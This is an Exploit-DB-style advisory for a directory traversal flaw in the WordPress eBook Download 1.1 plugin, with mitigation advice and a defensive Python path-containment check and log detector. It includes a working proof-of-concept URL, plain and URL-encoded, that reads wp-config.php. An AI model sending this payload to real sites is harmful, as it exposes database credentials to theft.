Vendor: eBook Download
By: Wadeek
CVSS: 7.5 (HIGH)
Vulnerability Type: Directory Traversal
CWE: 22
Product Name: eBook Download
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:ebook_download:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Xampp on Windows7
Year: 2020

WordPress eBook Download 1.1 | Directory Traversal

A directory traversal vulnerability exists in the WordPress eBook Download plugin, version 1.1, which allows an attacker to read arbitrary files on the server. The cause is that the 'filedownload.php' script does not validate the 'ebookdownloadurl' parameter before using it as a file path, so a crafted HTTP request whose parameter value contains directory traversal sequences (e.g. '../') makes the script return files outside the intended download directory.

Mitigation:

The vendor has released a patch that addresses this vulnerability; upgrade to the latest version of the plugin. Until then, requests to 'filedownload.php' whose 'ebookdownloadurl' value contains traversal sequences can be blocked or alerted on at the web server or WAF.
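The following Python is an added example, not part of this advisory or of the plugin's own (PHP) code. It shows the two things a defender wants from this advisory: the path-containment check that the description says the plugin lacked (resolve the requested name against the download directory and refuse anything that escapes it), and a detector that flags requests matching the PoC pattern in web-server access logs. The `ebooks` directory, the file names and the log lines are constructed for the example; the request path and parameter name are the ones the advisory gives.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit, parse_qs, unquote


def resolve_within(base_dir: str, requested: str):
    """Return the canonical path of `requested` if it stays inside `base_dir`,
    otherwise None.  realpath() resolves '..' segments and symlinks *before*
    the containment test, which is the check the vulnerable script lacked."""
    base = os.path.realpath(base_dir)
    # Strip leading separators so an absolute value cannot replace the base.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


# '..' as a whole path segment, with either separator.
TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")
VULN_SCRIPT = "/ebook-download/filedownload.php"
VULN_PARAM = "ebookdownloadurl"


def flag_request(log_line: str) -> bool:
    """True if an access-log line requests filedownload.php with a traversal
    sequence in the ebookdownloadurl parameter."""
    m = re.search(r'"(?:GET|POST) (\S+)', log_line)
    if not m:
        return False
    parts = urlsplit(m.group(1))
    if not parts.path.endswith(VULN_SCRIPT):
        return False
    # parse_qs URL-decodes once; decode once more so a double-encoded
    # value is inspected in the same form the file system would see.
    for value in parse_qs(parts.query).get(VULN_PARAM, []):
        if TRAVERSAL.search(unquote(value)):
            return True
    return False


# Constructed sample log lines (Apache combined format) for the example.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2020:10:00:00 +0000] "GET /wp-content/plugins/'
    'ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3102',
    '203.0.113.6 - - [01/Jan/2020:10:00:01 +0000] "GET /wp-content/plugins/'
    'ebook-download/filedownload.php?ebookdownloadurl=guide.pdf HTTP/1.1" 200 88512',
    '203.0.113.7 - - [01/Jan/2020:10:00:02 +0000] "GET /wp-content/plugins/'
    'ebook-download/filedownload.php?ebookdownloadurl=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3102',
]


def demo_path_check() -> dict:
    """Build a throwaway layout (ebooks/guide.pdf beside wp-config.php) and
    show which requests the containment check admits."""
    with tempfile.TemporaryDirectory() as tmp:
        ebooks = os.path.join(tmp, "ebooks")
        os.mkdir(ebooks)
        open(os.path.join(ebooks, "guide.pdf"), "w").close()
        open(os.path.join(tmp, "wp-config.php"), "w").close()
        return {
            "guide.pdf": resolve_within(ebooks, "guide.pdf") is not None,
            "../wp-config.php": resolve_within(ebooks, "../wp-config.php") is not None,
        }


if __name__ == "__main__":
    print("containment check:", demo_path_check())
    for line in SAMPLE_LOG:
        print("FLAG" if flag_request(line) else "ok  ", line.split('"')[1])
```

The containment check compares canonical paths rather than searching the input for '..', so encoded or oddly separated variants are handled by the file system's own normalisation; the log detector, by contrast, has to decode the value itself before pattern matching, which is why it applies one extra `unquote`.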
Source (Exploit-DB raw data):

# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
 
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
 
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================